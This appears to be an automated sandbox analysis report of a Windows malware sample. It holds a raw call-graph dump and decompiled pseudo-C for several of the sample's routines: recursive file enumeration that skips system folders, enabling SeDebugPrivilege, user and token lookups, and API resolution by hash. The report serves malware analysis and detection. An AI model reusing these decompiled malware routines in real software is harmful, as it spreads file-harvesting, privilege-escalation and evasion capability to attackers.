17691->17692 17693 402b7c 2 API calls 17691->17693 17694 402bab 2 API calls 17692->17694 17695 405b39 17693->17695 17694->17688 17695->17692 17696 405b40 17695->17696 17697 402bab 2 API calls 17696->17697 17697->17688 17699 4031e5 4 API calls 17698->17699 17700 4059ab 17699->17700 17700->17691 14862 410cd1 14867 412093 14862->14867 14865 412093 13 API calls 14866 410cff 14865->14866 14868 410cf1 14867->14868 14870 4120a5 14867->14870 14868->14865 14869 4120b3 14871 404056 7 API calls 14869->14871 14870->14869 14875 412100 14870->14875 14872 4120ba 14871->14872 14872->14868 14873 405b6f 6 API calls 14872->14873 14874 412152 14872->14874 14879 412125 14873->14879 14889 403d74 14874->14889 14875->14868 14876 403fbf 7 API calls 14875->14876 14876->14872 14879->14874 14880 412139 14879->14880 14881 41214d 14879->14881 14885 402bab 2 API calls 14880->14885 14884 402bab 2 API calls 14881->14884 14882 402bab 2 API calls 14886 41218c 14882->14886 14883 402bab 2 API calls 14883->14868 14884->14874 14887 41213e 14885->14887 14886->14868 14886->14883 14888 402bab 2 API calls 14887->14888 14888->14868 14890 403d87 14889->14890 14891 403ea3 14890->14891 14892 405b6f 6 API calls 14890->14892 14893 405b6f 6 API calls 14891->14893 14894 403da3 14892->14894 14895 403eb9 14893->14895 14894->14891 14896 4031e5 4 API calls 14894->14896 14897 4031e5 4 API calls 14895->14897 14906 403f6f 14895->14906 14899 403dbc FindFirstFileW 14896->14899 14898 403ed3 FindFirstFileW 14897->14898 14900 403f8d 14898->14900 14908 403ee8 14898->14908 14901 403e9c 14899->14901 14904 403dd1 14899->14904 14902 402bab 2 API calls 14900->14902 14903 402bab 2 API calls 14901->14903 14902->14906 14903->14891 14905 4031e5 4 API calls 14904->14905 14914 405b6f 6 API calls 14904->14914 14919 403d74 7 API calls 14904->14919 14923 402bab 2 API calls 14904->14923 14924 403f63 14904->14924 14907 403e84 FindNextFileW 14905->14907 14906->14882 14906->14886 14907->14904 14909 403e96 14907->14909 14910 4031e5 4 API calls 14908->14910 14912 405b6f 6 API calls 14908->14912 14916 403f75 14908->14916 14922 402bab 2 API calls 14908->14922 14928 403bef 14909->14928 14913 403f50 FindNextFileW 14910->14913 14912->14908 14913->14908 14915 403f87 14913->14915 14914->14904 14917 403bef 5 API calls 14915->14917 14918 402bab 2 API calls 14916->14918 14917->14900 14920 403f7b 14918->14920 14919->14904 14921 403bef 5 API calls 14920->14921 14921->14906 14922->14908 14923->14904 14925 402bab 2 API calls 14924->14925 14926 403f69 14925->14926 14927 403bef 5 API calls 14926->14927 14927->14906 14929 4031e5 4 API calls 14928->14929 14930 403c01 FindClose 14929->14930 14930->14901 15117 4049dc 15118 4031e5 4 API calls 15117->15118 15119 4049ef SHEnumKeyExW 15118->15119 15120 40ecde 15121 412093 13 API calls 15120->15121 15122 40ecfd 15121->15122 15123 412093 13 API calls 15122->15123 15124 40ed0d 15123->15124 15128 40e8df 15129 412093 13 API calls 15128->15129 15130 40e8f8 15129->15130 15131 412093 13 API calls 15130->15131 15132 40e908 15131->15132 15139 404b22 15132->15139 15134 40e93d 15135 40e91c 15135->15134 15136 40e936 15135->15136 15146 40e944 15135->15146 15138 402bab 2 API calls 15136->15138 15138->15134 15140 402b7c 2 API calls 15139->15140 15141 404b33 15140->15141 15145 404b66 15141->15145 15155 4049b3 15141->15155 15143 404b5f 15144 402bab 2 API calls 15143->15144 15143->15145 15144->15145 15145->15135 15147 4056bf 2 API calls 15146->15147 15148 40e952 15147->15148 15149 40e976 15148->15149 15150 4057df 14 API calls 15148->15150 15149->15136 15151 40e966 15150->15151 15152 413aca 4 API calls 15151->15152 15153 40e970 15152->15153 15154 405695 2 API calls 15153->15154 15154->15149 15156 4031e5 4 API calls 15155->15156 15157 4049c6 SHGetValueW 15156->15157 15157->15143 15158 4139de 15167 413855 15158->15167 15160 4139f1 15161 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 15160->15161 15165 4139f7 15161->15165 15162 413866 65 API calls 15163 413a2d 15162->15163 15164 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 15163->15164 15166 413a34 15164->15166 15165->15162 15168 4031e5 4 API calls 15167->15168 15169 413864 15168->15169 15169->15169 15189 4094e7 15190 404b22 7 API calls 15189->15190 15191 4094fe 15190->15191 15192 409554 15191->15192 15193 405b6f 6 API calls 15191->15193 15194 409514 15193->15194 15195 404b22 7 API calls 15194->15195 15202 40954d 15194->15202 15197 40952d 15195->15197 15196 402bab 2 API calls 15196->15192 15198 409544 15197->15198 15199 409408 18 API calls 15197->15199 15200 402bab 2 API calls 15198->15200 15201 40953e 15199->15201 15200->15202 15203 402bab 2 API calls 15201->15203 15202->15196 15203->15198 15249 404df3 WSAStartup 15253 4091f6 15254 404b22 7 API calls 15253->15254 15255 40920b 15254->15255 15256 409222 15255->15256 15257 409408 18 API calls 15255->15257 15258 40921c 15257->15258 15259 402bab 2 API calls 15258->15259 15259->15256 15263 40e880 15264 41219c 15 API calls 15263->15264 15265 40e88e 15264->15265 15266 41219c 15 API calls 15265->15266 15267 40e89c 15266->15267 15364 410390 15365 404b22 7 API calls 15364->15365 15366 4103a5 15365->15366 15367 410409 15366->15367 15368 405b6f 6 API calls 15366->15368 15372 4103ba 15368->15372 15369 410402 15370 402bab 2 API calls 15369->15370 15370->15367 15371 402bab 2 API calls 15371->15369 15372->15369 15373 403d74 11 API calls 15372->15373 15376 4103fb 15372->15376 15374 4103ee 15373->15374 15375 402bab 2 API calls 15374->15375 15374->15376 15375->15376 15376->15371 15383 410c98 15384 41219c 15 API calls 15383->15384 15385 410ca8 15384->15385 15386 41219c 15 API calls 15385->15386 15387 410cb5 15386->15387 15388 412093 13 API calls 15387->15388 15389 410cc9 15388->15389 15393 40f49e 15394 40f4b6 14 API calls 15393->15394 15395 40f4a8 15394->15395 15396 40929e 15397 413b28 7 API calls 15396->15397 15398 4092a4 15397->15398 15399 405b6f 6 API calls 15398->15399 15400 4092af 15399->15400 15401 4092c5 15400->15401 15402 409408 18 API calls 15400->15402 15403 4092bf 15402->15403 15404 402bab 2 API calls 15403->15404 15404->15401 15438 4090aa 15439 404b22 7 API calls 15438->15439 15440 4090c1 15439->15440 15442 409408 18 API calls 15440->15442 15448 4090d8 15440->15448 15441 404b22 7 API calls 15443 4090eb 15441->15443 15444 4090d2 15442->15444 15445 409104 15443->15445 15447 408c4d 17 API calls 15443->15447 15446 402bab 2 API calls 15444->15446 15446->15448 15449 4090fe 15447->15449 15448->15441 15450 402bab 2 API calls 15449->15450 15450->15445 15457 409cae 15472 404b79 15457->15472 15459 409d2f 15460 409cc5 15460->15459 15462 405b6f 6 API calls 15460->15462 15469 409d27 15460->15469 15461 402bab 2 API calls 15461->15459 15463 409cec 15462->15463 15464 404b79 7 API calls 15463->15464 15463->15469 15465 409d05 15464->15465 15466 408c4d 17 API calls 15465->15466 15471 409d1e 15465->15471 15468 409d18 15466->15468 15467 402bab 2 API calls 15467->15469 15470 402bab 2 API calls 15468->15470 15469->15461 15470->15471 15471->15467 15473 404b22 7 API calls 15472->15473 15474 404b8a 15473->15474 15474->15460 15504 40f6b8 15505 41219c 15 API calls 15504->15505 15506 40f6c7 15505->15506 15507 41219c 15 API calls 15506->15507 15508 40f6d5 15507->15508 15509 41219c 15 API calls 15508->15509 15510 40f6df 15509->15510 15526 40d6bd 15527 4056bf 2 API calls 15526->15527 15528 40d6c9 15527->15528 15539 404cbf 15528->15539 15531 404cbf 8 API calls 15532 40d6f4 15531->15532 15533 404cbf 8 API calls 15532->15533 15534 40d702 15533->15534 15535 413aca 4 API calls 15534->15535 15536 40d711 15535->15536 15537 405695 2 API calls 15536->15537 15538 40d71f 15537->15538 15540 402b7c 2 API calls 15539->15540 15541 404ccd 15540->15541 15542 404ddc 15541->15542 15543 404b8f 5 API calls 15541->15543 15542->15531 15544 404ce4 15543->15544 15545 404dd4 15544->15545 15546 402b7c 2 API calls 15544->15546 15547 402bab 2 API calls 15545->15547 15554 404d04 15546->15554 15547->15542 15548 404dcc 15549 404a39 5 API calls 15548->15549 15549->15545 15550 404dc6 15551 402bab 2 API calls 15550->15551 15551->15548 15552 402b7c 2 API calls 15552->15554 15553 404b8f 5 API calls 15553->15554 15554->15548 15554->15550 15554->15552 15554->15553 15555 402bab GetProcessHeap HeapFree 15554->15555 15556 404a39 5 API calls 15554->15556 15557 405b6f 6 API calls 15554->15557 15558 404cbf 8 API calls 15554->15558 15555->15554 15556->15554 15557->15554 15558->15554 15562 40f0bf 15563 4056bf 2 API calls 15562->15563 15564 40f0c9 15563->15564 15566 404cbf 8 API calls 15564->15566 15574 40f115 15564->15574 15565 41219c 15 API calls 15567 40f128 15565->15567 15568 40f0ed 15566->15568 15569 404cbf 8 API calls 15568->15569 15570 40f0fb 15569->15570 15571 413aca 4 API calls 15570->15571 15572 40f10a 15571->15572 15573 405695 2 API calls 15572->15573 15573->15574 15574->15565

                          Executed Functions

                          Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 403d74-403d90 call 4067c4 257 403d96-403da9 call 405b6f 254->257 258 403ea9-403ec0 call 405b6f 254->258 263 403ea6-403ea8 257->263 264 403daf-403dcb call 4031e5 FindFirstFileW 257->264 265 403f95 258->265 266 403ec6-403ee2 call 4031e5 FindFirstFileW 258->266 263->258 274 403dd1-403dd8 264->274 275 403e9d-403ea4 call 402bab 264->275 267 403f97-403f9d 265->267 272 403ee8-403ef8 call 405d24 266->272 273 403f8e-403f94 call 402bab 266->273 289 403f03-403f0a 272->289 290 403efa-403f01 272->290 273->265 279 403e75-403e90 call 4031e5 FindNextFileW 274->279 280 403dde-403de2 274->280 275->263 279->274 293 403e96-403e97 call 403bef 279->293 285 403e12-403e22 call 405d24 280->285 286 403de4-403df9 call 405eff 280->286 302 403e30-403e4c call 405b6f 285->302 303 403e24-403e2e 285->303 286->279 299 403dfb-403e10 call 405eff 286->299 295 403f12-403f2d call 405b6f 289->295 296 403f0c-403f10 289->296 290->289 294 403f41-403f5c call 4031e5 FindNextFileW 290->294 306 403e9c 293->306 309 403f87-403f88 call 403bef 294->309 310 403f5e-403f61 294->310 295->294 312 403f2f-403f33 295->312 296->294 296->295 299->279 299->285 302->279 316 403e4e-403e6f call 403d74 call 402bab 302->316 303->279 303->302 306->275 318 403f8d 309->318 310->272 314 403f75-403f85 call 402bab call 403bef 312->314 315 403f35-403f40 call 402bab 312->315 314->267 315->294 316->279 330 403f63-403f73 call 402bab call 403bef 316->330 318->273 330->267
                          C-Code - Quality: 85%
                          			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                          0x00403d82
                          0x00403d88
                          0x00403d8c
                          0x00403d8d
                          0x00403d90
                          0x00403ea9
                          0x00403ea9
                          0x00403eb9
                          0x00403ebb
                          0x00403ec0
                          0x00403f95
                          0x00403f95
                          0x00000000
                          0x00403f95
                          0x00403ece
                          0x00403edb
                          0x00403edd
                          0x00403ee2
                          0x00403f8e
                          0x00403f8f
                          0x00000000
                          0x00403f94
                          0x00000000
                          0x00403ee8
                          0x00403ef8
                          0x00403f0a
                          0x00403f12
                          0x00403f18
                          0x00403f26
                          0x00403f28
                          0x00403f2d
                          0x00000000
                          0x00000000
                          0x00403f33
                          0x00403f76
                          0x00403f7c
                          0x00000000
                          0x00403f83
                          0x00403f36
                          0x00403f3a
                          0x00000000
                          0x00403f40
                          0x00403f0c
                          0x00403f10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403f41
                          0x00403f41
                          0x00403f4b
                          0x00403f58
                          0x00403f5c
                          0x00403f88
                          0x00000000
                          0x00403f8d
                          0x00403f60
                          0x00000000
                          0x00403f60
                          0x00403ef8
                          0x00403ee8
                          0x00403da3
                          0x00403da9
                          0x00403ea6
                          0x00403ea8
                          0x00000000
                          0x00403ea8
                          0x00403db7
                          0x00403dc4
                          0x00403dc6
                          0x00403dcb
                          0x00403e9d
                          0x00403e9e
                          0x00403ea4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403dd1
                          0x00403dd1
                          0x00403dd8
                          0x00000000
                          0x00000000
                          0x00403de2
                          0x00403e12
                          0x00403e22
                          0x00403e30
                          0x00403e36
                          0x00403e3f
                          0x00403e44
                          0x00403e47
                          0x00403e4a
                          0x00403e4c
                          0x00000000
                          0x00000000
                          0x00403e63
                          0x00403e65
                          0x00403e6a
                          0x00403e6f
                          0x00403f64
                          0x00403f6a
                          0x00000000
                          0x00403f71
                          0x00000000
                          0x00403e6f
                          0x00403e26
                          0x00403e27
                          0x00403e2e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e2e
                          0x00403dea
                          0x00403df9
                          0x00000000
                          0x00000000
                          0x00403e01
                          0x00403e10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403e75
                          0x00403e7f
                          0x00403e8c
                          0x00403e8e
                          0x00403e97
                          0x00000000

                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                          • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                          • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID: %s\%s$%s\*$Program Files$Windows
                          • API String ID: 1690352074-2009209621
                          • Opcode ID: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
                          • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                          • Opcode Fuzzy Hash: 63e1f370609dfed3717ff2c0158d5115428f49d0583d80af2640003a87fa6112
                          • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                          Download Yara Rule
                          C-Code - Quality: 78%
                          			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                          0x00406512
                          0x00406514
                          0x00406522
                          0x00406524
                          0x00406530
                          0x00406534
                          0x0040653f
                          0x0040654e
                          0x00406552
                          0x0040655a
                          0x0040655f
                          0x0040656d
                          0x00406570
                          0x00406573
                          0x0040657a
                          0x00406589
                          0x0040658d
                          0x00406590
                          0x00406594
                          0x00000000
                          0x0040659a
                          0x004065a1

                          APIs
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                          • String ID: SeDebugPrivilege
                          • API String ID: 3615134276-2896544425
                          • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                          • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                          • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00406069 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                          0x00406077
                          0x00406082
                          0x00406085

                          APIs
                          • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                          • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                          • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                          Download Yara Rule
                          APIs
                          • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                          • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                          • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004061C3 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 151COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 335 4061c3-4061f2 call 402bf2 call 4031e5 341 4061f4-4061ff GetLastError 335->341 342 40622a-40623b call 402b7c 335->342 343 406201-406203 341->343 344 406208-406228 call 4060ac call 4031e5 341->344 350 40624c-406258 call 402b7c 342->350 351 40623d-406249 call 40338c 342->351 346 406329-40632e 343->346 344->342 344->343 358 406269-406290 call 4031e5 GetTokenInformation 350->358 359 40625a-406266 call 40338c 350->359 351->350 365 406292-4062a0 call 402b7c 358->365 366 4062fe-406302 358->366 359->358 365->366 375 4062a2-4062b9 call 406086 365->375 367 406304-406307 call 403c40 366->367 368 40630d-40630f 366->368 374 40630c 367->374 372 406311-406317 call 402bab 368->372 373 406318-40631e 368->373 372->373 377 406320-406326 call 402bab 373->377 378 406327 373->378 374->368 384 4062f5-4062fd call 402bab 375->384 385 4062bb-4062e4 call 4031e5 LookupAccountSidW 375->385 377->378 378->346 384->366 385->384 390 4062e6-4062f3 call 405b6f 385->390 390->384
                          C-Code - Quality: 81%
                          			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				WCHAR* _v8;
				long _v12;
				void** _v16;
				WCHAR* _v20;
				long _v24;
				long _v28;
				union _SID_NAME_USE _v32;
				intOrPtr* _t25;
				WCHAR* _t27;
				WCHAR* _t30;
				WCHAR* _t31;
				WCHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t40;
				long _t44;
				intOrPtr* _t45;
				WCHAR* _t46;
				void* _t48;
				WCHAR* _t49;
				WCHAR* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 = LookupAccountSidW(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}

























                          0x004061c3
                          0x004061cb
                          0x004061cd
                          0x004061d0
                          0x004061de
                          0x004061e0
                          0x004061e5
                          0x004061e9
                          0x004061eb
                          0x004061ed
                          0x004061f2
                          0x0040622a
                          0x00406230
                          0x00406235
                          0x00406239
                          0x0040623b
                          0x00406244
                          0x00406249
                          0x00406249
                          0x0040624c
                          0x00406253
                          0x00406256
                          0x00406258
                          0x00406261
                          0x00406266
                          0x00406266
                          0x00406270
                          0x00406273
                          0x00406276
                          0x0040627b
                          0x0040627e
                          0x0040628c
                          0x0040628e
                          0x00406290
                          0x00406295
                          0x0040629a
                          0x0040629e
                          0x004062a0
                          0x004062ac
                          0x004062af
                          0x004062b7
                          0x004062b9
                          0x004062c9
                          0x004062e0
                          0x004062e2
                          0x004062e4
                          0x004062f3
                          0x004062f3
                          0x004062e4
                          0x004062f8
                          0x004062fd
                          0x004062a0
                          0x004062fe
                          0x00406302
                          0x00406307
                          0x0040630c
                          0x0040630d
                          0x0040630f
                          0x00406312
                          0x00406317
                          0x00406318
                          0x0040631c
                          0x0040631e
                          0x00406321
                          0x00406326
                          0x00000000
                          0x00406327
                          0x004061f4
                          0x004061ff
                          0x00406208
                          0x00406218
                          0x0040621d
                          0x00406224
                          0x00406226
                          0x00406228
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406228
                          0x00406201
                          0x00000000

                          APIs
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                          • _wmemset.LIBCMT ref: 00406244
                          • _wmemset.LIBCMT ref: 00406261
                          • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                          • LookupAccountSidW.ADVAPI32(00000000,?,?,?,00000000,?,?,00000009,C0862E2B,00000000,00000000), ref: 004062E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_400000_xmtxpy.jbxd
                          Yara matches
                          Similarity
                          • API ID: _wmemset$AccountErrorInformationLastLookupToken
                          • String ID: IDA$IDA
                          • API String ID: 3235442692-2020647798
                          • Opcode ID: 2112e895418518b3aaf2b5de2dd6d1e0f0097c6d5c5f57a4f240550e55cdae00
                          • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                          • Opcode Fuzzy Hash: 2112e895418518b3aaf2b5de2dd6d1e0f0097c6d5c5f57a4f240550e55cdae00
